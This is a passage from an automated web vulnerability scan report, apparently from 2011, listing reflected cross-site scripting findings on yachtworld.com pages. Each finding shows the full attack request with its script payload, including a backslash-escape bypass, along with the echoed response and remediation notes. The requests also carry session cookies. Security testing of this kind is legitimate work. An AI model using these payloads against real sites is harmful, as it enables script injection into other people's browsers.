savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:30:49 GMT
Server: Apache
Cache-Control: private
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<!-- /opt/weblogic/waeyw/ywcluster
...[SNIP]...
<a href='/core/listing/pl_display_photo.jsp?&hosturl=denisonyachtsales&&ywo=denisonyachtsales2688e'><script>alert(1)</script>fce754dc703&slim=broker&boat_id=2212114&boatname=31%27+Sea+Vee+SeaVee+Center+Console+Factory+Built+Tower+like+Intrepid+contender+regulator&photo_revised_date=1280056306000&photo_name=Photo+1&photo
...[SNIP]...

3.448. http://www.yachtworld.com/core/listing/pl_boat_detail.jsp [ywo parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/pl_boat_detail.jsp

Issue detail

The value of the ywo request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8000f\'%3balert(1)//afa372d34c1 was submitted in the ywo parameter. This input was echoed as 8000f\\';alert(1)//afa372d34c1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /core/listing/pl_boat_detail.jsp?sponsored=true&units=Feet&checked_boats=2212114&slim=broker&&hosturl=denisonyachtsales&ywo=denisonyachtsales8000f\'%3balert(1)//afa372d34c1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:31:02 GMT
Server: Apache
Cache-Control: private
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<!-- /opt/weblogic/waeyw/ywcluster
...[SNIP]...
<a href=\'/core/listing/pl_display_photo.jsp?&hosturl=denisonyachtsales&&ywo=denisonyachtsales8000f\\';alert(1)//afa372d34c1&slim=broker&boat_id=2212114&boatname=31%27+Sea+Vee+SeaVee+Center+Console+Factory+Built+Tower+like+Intrepid+contender+regulator&photo_revised_date=1280056306000&photo_name=Photo+1&photo
...[SNIP]...

3.449. http://www.yachtworld.com/core/listing/pl_boat_detail_handler.jsp [&ywo parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/pl_boat_detail_handler.jsp

Issue detail

The value of the &ywo request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 41dcf'><script>alert(1)</script>647c7240fab was submitted in the &ywo parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /core/listing/pl_boat_detail_handler.jsp?slim=broker&hosturl=starlingmarine&units=Feet&boat_id=2275416&primary_photo_id=1&back=%2Fcore%2Flisting%2Fcache%2Fpl_search_results.jsp%3Fps%3D50%26slim%3Dbroker%26page%3Dbroker%26ywo%3Dstarlingmarine%26hosturl%3Dstarlingmarine%26luom%3D126&searchtype=buy&hosturl=starlingmarine&&ywo=starlingmarine41dcf'><script>alert(1)</script>647c7240fab& HTTP/1.1
Host: www.yachtworld.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yw_c_id=5778232892790151794; __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.3.10.1296155835; s_pers=%20s_nr%3D1296155882977%7C1298747882977%3B%20s_lv%3D1296155882978%7C1390763882978%3B%20s_lv_s%3DFirst%2520Visit%7C1296157682978%3B; s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3D%3B

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:40:32 GMT
Server: Apache
Cache-Control: private
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Type: text/html; charset=utf-8
Content-Length: 17126

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<!-- /opt/weblogic/waeyw/ywcluster
...[SNIP]...
<a href='/core/listing/pl_display_photo.jsp?&hosturl=starlingmarine&&ywo=starlingmarine41dcf'><script>alert(1)</script>647c7240fab&slim=broker&boat_id=2275416&boatname=33%27+Grady+White+330+Express&photo_revised_date=1287073053000&photo_name=Photo+1&photo=1&url='>
...[SNIP]...

3.450. http://www.yachtworld.com/core/listing/pl_boat_detail_handler.jsp [&ywo parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/pl_boat_detail_handler.jsp

Issue detail

The value of the &ywo request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e3d60\'%3balert(1)//fb98686bdcc was submitted in the &ywo parameter. This input was echoed as e3d60\\';alert(1)//fb98686bdcc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /core/listing/pl_boat_detail_handler.jsp?slim=broker&hosturl=starlingmarine&units=Feet&boat_id=2275416&primary_photo_id=1&back=%2Fcore%2Flisting%2Fcache%2Fpl_search_results.jsp%3Fps%3D50%26slim%3Dbroker%26page%3Dbroker%26ywo%3Dstarlingmarine%26hosturl%3Dstarlingmarine%26luom%3D126&searchtype=buy&hosturl=starlingmarine&&ywo=starlingmarinee3d60\'%3balert(1)//fb98686bdcc& HTTP/1.1
Host: www.yachtworld.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yw_c_id=5778232892790151794; __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.3.10.1296155835; s_pers=%20s_nr%3D1296155882977%7C1298747882977%3B%20s_lv%3D1296155882978%7C1390763882978%3B%20s_lv_s%3DFirst%2520Visit%7C1296157682978%3B; s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3D%3B

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:40:53 GMT
Server: Apache
Cache-Control: private
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Type: text/html; charset=utf-8
Content-Length: 16800

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<!-- /opt/weblogic/waeyw/ywcluster
...[SNIP]...
<a href=\'/core/listing/pl_display_photo.jsp?&hosturl=starlingmarine&&ywo=starlingmarinee3d60\\';alert(1)//fb98686bdcc&slim=broker&boat_id=2275416&boatname=33%27+Grady+White+330+Express&photo_revised_date=1287073053000&photo_name=Photo+1&photo=1&url=\'>
...[SNIP]...

3.451. http://www.yachtworld.com/core/listing/pl_boat_detail_handler.jsp [&ywo parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/pl_boat_detail_handler.jsp

Issue detail

The value of the &ywo request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72009"><script>alert(1)</script>be7eb21517c was submitted in the &ywo parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /core/listing/pl_boat_detail_handler.jsp?slim=broker&hosturl=starlingmarine&units=Feet&boat_id=2275416&primary_photo_id=1&back=%2Fcore%2Flisting%2Fcache%2Fpl_search_results.jsp%3Fps%3D50%26slim%3Dbroker%26page%3Dbroker%26ywo%3Dstarlingmarine%26hosturl%3Dstarlingmarine%26luom%3D126&searchtype=buy&hosturl=starlingmarine&&ywo=starlingmarine72009"><script>alert(1)</script>be7eb21517c& HTTP/1.1
Host: www.yachtworld.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yw_c_id=5778232892790151794; __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.3.10.1296155835; s_pers=%20s_nr%3D1296155882977%7C1298747882977%3B%20s_lv%3D1296155882978%7C1390763882978%3B%20s_lv_s%3DFirst%2520Visit%7C1296157682978%3B; s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3D%3B

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:40:29 GMT
Server: Apache
Cache-Control: private
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Type: text/html; charset=utf-8
Content-Length: 17125

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<!-- /opt/weblogic/waeyw/ywcluster
...[SNIP]...
to.jsp?slim=broker&ybw=&boat_id=2275416&boatname=33%27+Grady+White+330+Express&photo_revised_date=1287073055000&photo_name=Photo+2&photo=2&hosturl=starlingmarine&&ywo=starlingmarine72009"><script>alert(1)</script>be7eb21517c&">
...[SNIP]...

3.452. http://www.yachtworld.com/core/listing/pl_boat_detail_handler.jsp [hosturl parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/pl_boat_detail_handler.jsp

Issue detail

The value of the hosturl request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2f651\'%3balert(1)//3211bed4f90 was submitted in the hosturl parameter. This input was echoed as 2f651\\';alert(1)//3211bed4f90 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /core/listing/pl_boat_detail_handler.jsp?slim=broker&hosturl=starlingmarine2f651\'%3balert(1)//3211bed4f90&units=Feet&boat_id=2275416&primary_photo_id=1&back=%2Fcore%2Flisting%2Fcache%2Fpl_search_results.jsp%3Fps%3D50%26slim%3Dbroker%26page%3Dbroker%26ywo%3Dstarlingmarine%26hosturl%3Dstarlingmarine%26luom%3D126&searchtype=buy&hosturl=starlingmarine&&ywo=starlingmarine& HTTP/1.1
Host: www.yachtworld.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yw_c_id=5778232892790151794; __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.3.10.1296155835; s_pers=%20s_nr%3D1296155882977%7C1298747882977%3B%20s_lv%3D1296155882978%7C1390763882978%3B%20s_lv_s%3DFirst%2520Visit%7C1296157682978%3B; s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3D%3B

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:39:31 GMT
Server: Apache
Cache-Control: private
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Type: text/html; charset=utf-8
Content-Length: 11635

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<!-- /opt/weblogic/waeyw/ywcluster
...[SNIP]...
<a href=\'/core/listing/pl_display_photo.jsp?&hosturl=starlingmarine2f651\\';alert(1)//3211bed4f90&&ywo=starlingmarine&slim=broker&boat_id=2275416&boatname=33%27+Grady+White+330+Express&photo_revised_date=1287073053000&photo_name=Photo+1&photo=1&url=\'>
...[SNIP]...

3.453. http://www.yachtworld.com/core/listing/pl_boat_detail_handler.jsp [hosturl parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/pl_boat_detail_handler.jsp

Issue detail

The value of the hosturl request parameter is copied into the HTML document as plain text between tags. The payload f86e0<script>alert(1)</script>c4313d48862 was submitted in the hosturl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /core/listing/pl_boat_detail_handler.jsp?slim=broker&hosturl=starlingmarinef86e0<script>alert(1)</script>c4313d48862&units=Feet&boat_id=2275416&primary_photo_id=1&back=%2Fcore%2Flisting%2Fcache%2Fpl_search_results.jsp%3Fps%3D50%26slim%3Dbroker%26page%3Dbroker%26ywo%3Dstarlingmarine%26hosturl%3Dstarlingmarine%26luom%3D126&searchtype=buy&hosturl=starlingmarine&&ywo=starlingmarine& HTTP/1.1
Host: www.yachtworld.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yw_c_id=5778232892790151794; __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.3.10.1296155835; s_pers=%20s_nr%3D1296155882977%7C1298747882977%3B%20s_lv%3D1296155882978%7C1390763882978%3B%20s_lv_s%3DFirst%2520Visit%7C1296157682978%3B; s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3D%3B

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:39:33 GMT
Server: Apache
Cache-Control: private
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Type: text/html; charset=utf-8
Content-Length: 11959

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

 Exception while reading the file:/opt/weblogic/waeyw/ywcluster/public_html/broker_pages/starlingmarinef86e0<script>alert(1)</script>c4313d48862/boats.header.html exception is java.io.FileNotFoundException: /opt/weblogic/waeyw/ywcluster/public_html/broker_pages/starlingmarinef86e0<script>
...[SNIP]...

3.454. http://www.yachtworld.com/core/listing/pl_boat_detail_handler.jsp [hosturl parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/pl_boat_detail_handler.jsp

Issue detail

The value of the hosturl request parameter is copied into an HTML comment. The payload 6e51f--><script>alert(1)</script>f1f1563518e was submitted in the hosturl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /core/listing/pl_boat_detail_handler.jsp?slim=broker&hosturl=starlingmarine6e51f--><script>alert(1)</script>f1f1563518e&units=Feet&boat_id=2275416&primary_photo_id=1&back=%2Fcore%2Flisting%2Fcache%2Fpl_search_results.jsp%3Fps%3D50%26slim%3Dbroker%26page%3Dbroker%26ywo%3Dstarlingmarine%26hosturl%3Dstarlingmarine%26luom%3D126&searchtype=buy&hosturl=starlingmarine&&ywo=starlingmarine& HTTP/1.1
Host: www.yachtworld.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
